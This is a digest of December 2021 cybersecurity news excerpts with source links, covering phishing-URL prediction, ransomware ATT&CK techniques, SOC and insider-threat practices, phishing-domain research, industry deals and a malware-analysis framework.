Table of Contents
- Innovative scanner that can intelligently predict malicious domains, URLs
- 5 Common Ransomware ATT&CK Techniques
- Honeywell opens security operations center in Europe, based in Romania
- The Insider Threat: Best Practices for Detection, Monitoring, and Prevention
- How a modern SOC can make your threat hunting smarter
- Shoreline.io Reinvents Runbooks with Industry’s First Purpose-Built Notebooks for On-Call Operations
- Security study finds a few best practices can have a big impact on threat protection
- Digging Up Zombie Domains: 3,800 Phishing Hosts
- Trend Micro Crowns Champions of 2021 Capture the Flag Competition
- Shifting security further left: DevSecOps becoming SecDevOps
- Gas stations and beyond: Why cybersecurity is a top priority for industrial infrastructure
- LogicMonitor Launches Australian Data Centre
- Wipro To Acquire Cybersecurity Firm Edgile For $230M
- Forrester TEI: Cybersixgill can deliver 311% ROI, enabling enterprises to scale dark web threat intelligence while closing the knowledge gaps
- Introducing DARTH: Distributed Analysis for Research and Threat Hunting
- Cybint brings Cyber Impact Bootcamp to over a dozen US colleges and universities to build back better education
Innovative scanner that can intelligently predict malicious domains, URLs
Qatar Tribune
A cyber security team at Hamad Bin Khalifa University (HBKU)’s Qatar Computing Research Institute (QCRI) has designed and patented a technology that not only detect current malicious phishing URLs, but can also predict those that will be malicious in the future.
The Bfore.AI Pre-Crime scanner was developed using QCRI’s licensed malicious URL prediction technology.
Based on its capabilities, the scanner was selected by VirusTotal to be one of its trusted scanners.
VirusTotal (virustotal.com) is a publicly available cyber security scanning service from Google that allows a user to check if a URL, file, or IP address is malicious or benign.
By carefully establishing and analyzing associations among URLs, the QCRI team was able to discover a large number of previously unknown malicious URLs.
This approach utilizes public data and does not create any privacy concerns.
Extensive testing of the approach demonstrated the early detection of malicious URLs.
The approach also enables large-scale detection of malicious URLs and is highly efficient and scalable.
Link: https://www.qatar-tribune.com/news-details/id/225822
5 Common Ransomware ATT&CK Techniques
Insikt Group
Recorded Future
The ATT&CK techniques highlighted in this research align with Insikt Group’s 2020 Top MITRE ATT&CK Techniques report, where the Defense Evasion tactic was the most commonly seen tactic in 2020.
The 5 ransomware techniques detailed in this report are as follows:
- 3 techniques from the Defense Evasion tactic: Disable or Modify Tools, Disable or Modify System Firewall, and Pre-OS Boot
- 1 technique from the Command and Control tactic: Ingress Tool Transfer
- 1 technique from the Privilege Escalation tactic: Group Policy Modification
Key Judgments
Ransomware operators continue to focus on developing techniques to evade defenses, aligning with Insikt Group’s 2020 Top MITRE ATT&CK Techniques report.
Sigma rules focused on particular TTPs used by threat actors can detect malicious behavior before the deployment of ransomware in many cases.
Sigma rules aligned with MITRE ATT&CK can help organizations define mitigations based on specific threat actor TTPs.
Link: https://www.recordedfuture.com/five-common-ransomware-techniques/
Honeywell opens security operations center in Europe, based in Romania
Help Net Security
Honeywell launched its first security operations center (SOC) in Europe, based in Romania.
The SOC focuses on operational technology (OT) cyber threat detection, prevention and management in industrial environments and critical infrastructure.
Link: https://www.helpnetsecurity.com/2021/12/17/honeywell-soc-romania/
The Insider Threat: Best Practices for Detection, Monitoring, and Prevention
ITs Mine Blog
As the old cliche goes, “you can’t build a great building without a sturdy foundation.” In the same regard, here are a few insider threat best practices that every organization should implement immediately:
- Mantraps to block unauthorized access to the property
- Multi-factor authentication for all employees
- Biometric measures to prevent impersonation
- Physical security around the building
- Organization-wide risk assessments
- Deactivating unused accounts
- Complex password policies
With these insider threat best practices in place, your organization has a greater chance of remaining breach-free in 2021 and beyond.
Remember this: the weakest link within an organization’s security system could be its employees, not the technology!
With BeyondDLP™, you have a comprehensive toolset that allows you to monitor, track, target, and block potential risks before they cause severe damage.
Our unparalleled FileGPS™ technology allows you to track, log and monitor your documents and data in real-time.
SoftwareMines™ are another powerful tool that prevent data breaches by detecting abnormal use of company data, whether from external attackers or insider threats (both malicious and unintentional).
Link: https://itsmine.io/resources/blog/the-insider-threat-best-practices-for-detection-monitoring-and-prevention/
How a modern SOC can make your threat hunting smarter
Kate Scarcella
Tech Beacon
Security operations centers are being overwhelmed by data.
Information from numerous sources—data from usage directories, asset inventory tools, geolocation tools, third-party threat intelligence databases, just to name a few—pour into the SOCs, where it’s expected to be crunched for possible threats that can be remedied by security analysts.
The funnel-and-crunch approach can also produce a boatload of alerts for analysts to investigate.
According to one Fortinet estimate (PDF), an analyst can expect to clear 20 to 25 alerts in a day.
Yet the average SOC receives 10,000 alerts a day.
For larger organizations, it’s even worse—upwards of 150,000 alerts a day.
When you consider how many of those alerts are false positives—around 50%—and how many lack severity, it’s easy to understand why there can be a lot of analyst churn in SOCs—anywhere from 10% to 50%, according to vendor Help Net Security—and why there’s little time for threat hunting.
According to a 2019 survey by the SANS Institute, 14% of organizations pegged the time between compromise and detection at from one to six months.
Adding to a SOC’s data woes is the Internet of Things.
There can be thousands of those devices feeding data into the SOC, turning a data pool into a data swamp.
If any of those devices are compromised, it is nearly impossible for a security team to discover it in time to make a difference by using the common approaches of data collection and analysis.
A system with intelligent agents on the IoT devices can also thwart threats in the bud through application whitelisting, preventing unauthorized data modification on the device, and controlling data flow integrity, making sure executables run correctly.
What’s more, machine learning and analytics can profile devices; they essentially create a unique fingerprint for each one.
Data from the devices can be enriched in real time and given context, which can make a SOC and threat hunters more effective.
Threat intelligence context can be used to enhance detection analytics, improving a SIEM’s ability to identify threats.
It can also be used to boost a threat’s risk score, prioritizing higher-risk threats for investigation.
By using endpoint detection and response (EDR) as a primary source of data, threat hunters can receive a handful of quality leads about potential malicious activity in their environment.
Keep learning
Learn from your SecOps peers with TechBeacon’s State of SecOps 2021 Guide.
Plus: Download the CyberRes 2021 State of Security Operations.
Get a handle on SecOps tooling with TechBeacon’s Guide, which includes the GigaOm Radar for SIEM.
The future is security as code.
Find out how DevSecOps gets you there with TechBeacon’s Guide.
Plus: See the SANS DevSecOps survey report for key insights for practitioners.
Get up to speed on cyber resilience with TechBeacon’s Guide.
Plus: Take the Cyber Resilience Assessment.
Put it all into action with TechBeacon’s Guide to a Modern Security Operations Center.
Link: https://techbeacon.com/security/how-modern-soc-can-make-your-threat-hunting-smarter
Shoreline.io Reinvents Runbooks with Industry’s First Purpose-Built Notebooks for On-Call Operations
Globe Newswire
REDWOOD CITY, Calif., Dec. 15, 2021 (GLOBE NEWSWIRE) — Shoreline.io, the Incident Automation company, today introduced Shoreline Notebooks, the first purpose-built notebooks for debugging and repairing production infrastructure.
Shoreline is reinventing the runbook, transforming static documents into live notebooks that contain real-time debug data and pre-approved repair activities.
With a web-based UI, Shoreline Notebooks automatically capture and then share best practice debug and remediation sessions.
Notebooks can also be tied to alarms, making it easy for on-call teams to quickly and safely resolve incidents.
Anurag Gupta, founder and CEO of Shoreline. “Just as Jupyter Notebooks transformed data science, Shoreline Notebooks are transforming on-call operations.
Our Notebooks make it easier to onboard new team members and to safely empower everyone on-call.”
Shoreline Notebooks are each individually launched by their own specific alarm, so there’s no more thumbing through a dense document to find the relevant section.
Link: https://www.globenewswire.com/news-release/2021/12/15/2352762/0/en/Shoreline-io-Reinvents-Runbooks-with-Industry-s-First-Purpose-Built-Notebooks-for-On-Call-Operations.html?f=22&fvtc=5&fvtv=32464777
Security study finds a few best practices can have a big impact on threat protection
Zk Research
Silicon Angle
Cisco Systems Inc. just released one of its largest-ever cybersecurity studies, providing a detailed view into the top five security practices proven to be most effective for organizations.
Cisco claims that those adopting the top practices can propel their security programs ahead of 79% of other organizations.
Cisco uncovered that across the 25 security practices it analyzed, five stood out from the rest: technology refresh, threat detection, disaster recovery, incident response and security product integration.
Considering 39% of security technologies used by organizations are antiquated, proactively refreshing outdated technology is at the top of the list of key security practices.
Cisco’s new study found organizations with modern, consolidated, cloud-based architectures are more than twice as likely to have strong tech refresh capabilities than those using outdated, distributed, on-premises systems.
This is a problem I see accelerating over the next few years.
The belief that frequent upgrades help security is proven out in the survey data.
Organizations that upgrade IT and security technologies quarterly are 30% better at keeping up with their business than organizations upgrading every few years.
The main drivers for refreshing security technologies are vendor-led (determined by providers), proactive (based on a predetermined schedule) or reactive (in response to an incident).
Nearly 66% of organizations that sync with vendor refresh cycles report strong capabilities.
The reactive approach to upgrades does put businesses at risk because it is often akin to closing the barn door after the horses have escaped.
A good example of this is zero trust.
In this recent SiliconANGLE post, I discussed how that technology could have minimized the damage from Log4j.
Zero trust has been available for a while and companies that were proactive are likely in a better place than ones that were not.
More than three-quarters of professionals surveyed in the study would rather buy integrated solutions than build them.
Sticking with a preferred vendor is about twice as likely to achieve well-integrated security technologies as a hands-off approach.
Furthermore, organizations with highly integrated systems for identifying critical assets and risks are more than 41% better at threat detection and response.
Developing threat detection and incident response capabilities are third and fourth on the top five list of key practices.
According to the study’s findings, most (92%) organizations with strong people, process and technology — the “p-p-t” pinnacle — achieve advanced threat detection and response capabilities.
This translates into 3.5 times greater performance for threat detection and response over organizations that lack p-p-t.
Organizations that conduct threat detection/response activities such as testing and updating, as well as proactively hunting and engaging in team exercises at least on a weekly basis, experience 30% greater performance compared with those that do them annually or less.
Additionally, organizations that make extensive use of threat intelligence are nearly twice as likely to report strong detection and response capabilities compared to those with lower usage.
Link: https://siliconangle.com/2021/12/19/security-study-finds-best-practices-can-big-impact-threat-protection/
Digging Up Zombie Domains: 3,800 Phishing Hosts
Jonathan Zhang
Cybercrime Magazine
Historical WHOIS information can uncover investigative breadcrumbs that are otherwise hidden
Researchers at WhoisXML API performed a digital footprinting analysis of more than 3,800 verified phishing hosts using historical WHOIS data.
The key findings of our downloadable white paper “Digging Up Zombie Domains: What WHOIS History Reveals about 3,800+ Verified Phishing Hosts” include the following:
- Phishing hosts can be both new and old domains, though our data shows that around 51 percent of them were more than a year old when they were reported on PhishTank.
- A quarter of them were created more than a decade ago.
- Available domains may have a malicious past.
- About 46 percent of the phishing hosts are available for registration despite having been used by threat actors between March 1 and May 31, 2020.
- The breadcrumbs the phishing domains left found through WHOIS history checks led us to more than 5,000 additional potentially risky or suspicious domains.
- All TLDs, regardless of registry and registrar, are prone to abuse.
- The phishing hosts in our study mostly fell under .com, .net, .co, .ru, and .org.
- Of the 3,870 unique phishing hosts PhishTank verified in June 2020, WHOIS history checks uncovered 1,421 unique registrant email addresses used when the domains were first created.
- More than half of them were unredacted, possibly since they were registered prior to the implementation and global repercussions of the General Data Protection Regulation (GDPR).
Link: https://cybersecurityventures.com/digging-up-zombie-domains-3800-phishing-hosts/
Trend Micro Crowns Champions of 2021 Capture the Flag Competition
PR Newswire
Central Charts
DALLAS, Dec. 20, 2021 /PRNewswire/ — Trend Micro Incorporated (TYO: 4704; TSE: 4704), a global cybersecurity leader, today announced the winners of its long-running Capture the Flag Competition, who squared off in a virtual final this week.
This year’s final event saw 12 teams from 14 countries competing in a series of challenges related to critical issues in cybersecurity.
Like the 2020 event, this year’s competition featured two virtual rounds: an online qualifier running over a 24-hour period and the finals event.
Teams battled it out for the CTF crown on December 18-19 in a Dynamic Jeopardy competition.
The final results from the competition are as follows:
- First Place: PwnThyBytes (Romania)
- Second Place: Bad Guesser (China)
- Third Place: CodeRed (Korea)
Shifting security further left: DevSecOps becoming SecDevOps
Help Net Security
Veracode has revealed usage data that demonstrates cybersecurity is becoming more automated and componentized in line with modern software architectures and development practices.
The analysis of 5,446,170 static scans and more than 310,000 apps over a 13-month period from September 2020 to October 2021 found a startling 143 percent growth in the number of small apps, like APIs and microservices, and a 133 percent increase in automated scans run through APIs instead of manually.
Componentization drives speed and efficiencies
Alongside the upward trajectory in automation, Veracode also found a downward trend in the complexity and size of the code being analyzed, as evidenced by the 30% reduction in the average number of modules scanned per scan, indicating a shift toward scanning of individual components or microservices.
This is not surprising considering the rapid adoption of both componentized applications and DevOps practices.
Software cybersecurity must be pervasive, not invasive
With the rising cost and complexity of modern software development practices, businesses will increasingly require a comprehensive, fully integrated security platform with fewer disparate tools.
This platform supports pervasive, or continuous, security because it:
Starts in the design phase
Is fully integrated, but also open
Delivers a frictionless developer experience
Link: https://www.helpnetsecurity.com/2021/12/20/cybersecurity-software-development/
Gas stations and beyond: Why cybersecurity is a top priority for industrial infrastructure
Backend News
Through our research, we managed to classify what could go wrong in this process.
There are several potential operational technology (OT) and IT security issues that can affect the work of the station.
The first group of risks involves potential remote access from external networks.
Just like many industrial systems today, the gas station employs solutions that are connected to public services through the internet, these include cloud banking systems or specialized fleet management systems.
Remote access to the fuel station allows further malicious actions inside the network.
There are also suppliers and service companies that have access to some parts of the infrastructure.
Compromising these third parties may open doors to the target system for attackers.
In fact, this type of threat is of great concern for companies of any size profile: a third (32%) of large organizations suffered attacks involving data shared with suppliers.
What’s more, the financial impact of such incidents on enterprises is the highest across all types of attacks in 2021.
Another set of risks involves network and device issues that may potentially lead to the disruption of fuel station services or direct financial impact.
Attacks can come from remote networks or by connecting to wireless networks or wired network ports available onsite.
Another critical but evergreen problem is vulnerabilities or security flaws in the fuel controller, POS terminals, and network equipment, as well as corporate endpoints and applications.
In 2015, 5,800 automatic tank gauges (ATGs) were found to be exposed to unauthorized access from the internet because of a lack of password protection on a serial port.
ATG is an electronic component placed in the tank that monitors the level of fuel and checks if it is leaking fluid.
And through this serial port, the ATG can be programmed.
If the signal it transfers is not correct, the operator won’t get an alert about any deviation.
Figures from 2015 also suggested that at the time, most systems were in gas stations in the US and represented 3% of those used in the country.
By compromising such critical systems as automatic tank gauges, criminals can unlock options for fraud or even physical damage.
Another point to manage is wireless gateways and reader units.
A security assessment should be performed to identify insecure industrial protocols, the possibility of jamming and spoofing attacks.
Link: https://backendnews.net/gas-stations-and-beyond-why-cybersecurity-is-a-top-priority-for-industrial-infrastructure/
LogicMonitor Launches Australian Data Centre
APM Digest
LogicMonitor has launched its first Australian data centre, located in Sydney and locally hosted by cloud provider Amazon Web Services.
The launch will support ongoing growth in the Australian market while assisting with compliance measures needed for any work done in the financial and public sector spaces.
With this new data centre, regional customers’ data will be housed locally, meaning LogicMonitor’s lightweight, cloud-based platform will be faster than ever, improving overall customer experience.
Link: https://www.apmdigest.com/logicmonitor-launches-australian-data-centre
Wipro To Acquire Cybersecurity Firm Edgile For $230M
C.J. Fairfield
CRN
Global IT consulting powerhouse Wipro announced this week that it will pay $230 million to add cybersecurity muscle to its portfolio with the acquisition of Edgile.
Austin, Texas-based cybersecurity consulting provider Edgile focuses on risk and compliance, information and cloud security, and digital identity and partners with such tech giants as Microsoft, ServiceNow and SailPoint.
Edgile is focused on its core three service lines which are risk and compliance, identity and cloud security.
Link: https://www.crn.com/news/channel-programs/wipro-to-acquire-cybersecurity-firm-edgile-for-230m
Forrester TEI: Cybersixgill can deliver 311% ROI, enabling enterprises to scale dark web threat intelligence while closing the knowledge gaps
Meira Primes
Cyber Six Gill Blog
A recent Total Economic Impact (TEI) conducted by independent consulting firm Forrester has affirmed: organizations employing Cybersixgill products experienced benefits of almost $1.57, and a 311% return on investment.
“A small cybersecurity team, historically spending 40 hours per week collecting, analyzing, and understanding dark web data, can use Cybersixgill automation to reduce that to just a few hours per week.” – Cybersecurity Practice Manager
Key benefits of implementing and using Cybersixgill solutions:
- Cybersixgill provides savings of over $648,000 over three years in avoided staff expansion to meet growing threat intelligence business demand.
- Cybersixgill provides dark web data and the tools to analyze it with basic cybersecurity abilities.
- Cybersixgill offers savings in development, training, and licensing costs that add up to over $382,000 over three years.
Introducing DARTH: Distributed Analysis for Research and Threat Hunting
Meira Primes
vmWare
As part of our research, we often find ourselves running new types of analysis on large collections of malicious samples; building a scalable and easy to extend infrastructure is therefore a functional requirement.
We decided to adopt (and extend) an analysis framework developed by researchers from Eurecom.
Research software provides reference implementations of novel approaches to security, but, at the same time, it is notorious for its lack of support, lack of documentation, and general fragility.
The DARTH Framework
The first challenge was to redesign the infrastructure to allow analysis modules to scale as necessary.
To achieve this goal, we split the framework into four different logical components so that each could run as a different Docker container:
Commander: Interface where the user can submit samples and decide which analyses must be performed, and where the user can see the results of previous analyses.
Scheduler: Responsible for scheduling worker tasks.
It is also responsible for copying the sample to the chosen worker and returning the result to the commander once the analysis is complete.
Worker: Responsible for the analysis of the sample.
Database: Stores the samples’ metadata and the results of the various analyses.
These components are further orchestrated using Docker swarm.
Link: https://blogs.vmware.com/networkvirtualization/2021/12/introducing-darth-distributed-analysis-for-research-and-threat-hunting.html/?utm_source=rss&utm_medium=rss&utm_campaign=introducing-darth-distrib
Cybint brings Cyber Impact Bootcamp to over a dozen US colleges and universities to build back better education
Cision PR Web
NEW YORK, Dec. 23, 2021 /PRNewswire/ — Cybint, the software-as-a-service arm of ThriveDX (TDX), a global digital education giant formerly known as HackerU, announces a major expansion in the U.S. through a series of partnerships with more than a dozen colleges and universities secured throughout 2021.
By bringing its cybersecurity bootcamp to learners of all backgrounds and education levels, it has made future-proof digital skills more accessible to the U.S. population amid a larger nation-wide legislative push for a more inclusive and tech-oriented education in the country.
Rebranding the bootcamp to Impact in the wake of Cybint’s acquisition by ThriveDX in August 2021, the company showcases its commitment to making a difference for the modern workforce.
In 2021, Cybint teamed up with multiple higher education partners across the U.S., including community colleges such as: Loras College, College of Eastern Idaho, Northeast Community College in Nebraska, Lincoln Land Community College, South Arkansas Community College, Manchester Community College, Ozarks Technical Community College, Central Texas College, and more.
Link: https://www.prnewswire.com/news-releases/cybint-brings-cyber-impact-bootcamp-to-over-a-dozen-us-colleges-and-universities-to-build-back-better-education-301450418.html